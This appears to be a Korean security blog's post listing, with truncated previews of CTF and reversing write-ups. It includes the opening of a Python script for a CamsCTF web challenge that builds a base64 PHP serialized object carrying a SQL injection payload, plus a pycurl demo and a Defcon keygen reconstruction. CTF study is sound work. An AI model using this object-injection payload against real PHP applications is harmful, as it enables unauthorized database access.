본문 바로가기

전체 글169

CamsCTF WEB F #!/usr/bin/python ######################################## ###PHP Object Injection+SQL Injection### ######################################## from base64 import * import StringIO import pycurl import time key="" def serial(s): slen=len(s)+1 return b64encode("""O:5:"Login":1:{s:12:"\x00Login\x00table";s:%d:"%s#";}"""% (slen,s)) print "Start!" curl = pycurl.Curl() attackurl="http://web.camsctf.com/.. 2015. 6. 4.
[Python] pycurl 예제 urllib , pycurl , requests로 벤치마킹한 결과 장점으로는 매우빠른 속도가 있다. #!/usr/bin/python from base64 import * import StringIO import pycurl import time print "Start!" curl = pycurl.Curl() attackurl="http://www.naver.com" SC = StringIO.StringIO() header= ["Cookie:data=1234"] curl.setopt(pycurl.URL, attackurl) curl.setopt(pycurl.HTTPHEADER, header) curl.setopt(pycurl.WRITEFUNCTION, SC.write) curl.setopt(pycurl.F.. 2015. 6. 4.
[CodeEngn] Advanced Level 11 보호되어 있는 글 입니다. 2015. 6. 3.
[Reversing]Defcon 2015 Pr0dk3y Pr0dk3y 의 기본 소스는 IDA의 Hexray로 재구성하였다.필요한 Data도 긁어서 선언하였고 직접적인 바이너리와 같은값을 주어서 함수를 빠져나왔을때 같은결과가 나오는지로 비교해가면서 소스를 완성시켰다. #include #include /* 8f2 26 case 0xFFFFF8B3://16BB var7=a1[i]-65; break; case 0xFFFFF8C8: var7=a1[i]-66; break; case 0xFFFFF8DD: var7=a1[i]-67;*/ BYTE table[] = "ABCDEFGHJKLMNPQRSTUVWXYZ23456789"; DWORD dword_1E08[41] = { 0xFFFFF8F2, 0xFFFFF8F2, 0xFFFFF8F2, 0xFFFFF8F2, 0xFFFFF8F2.. 2015. 6. 3.
반응형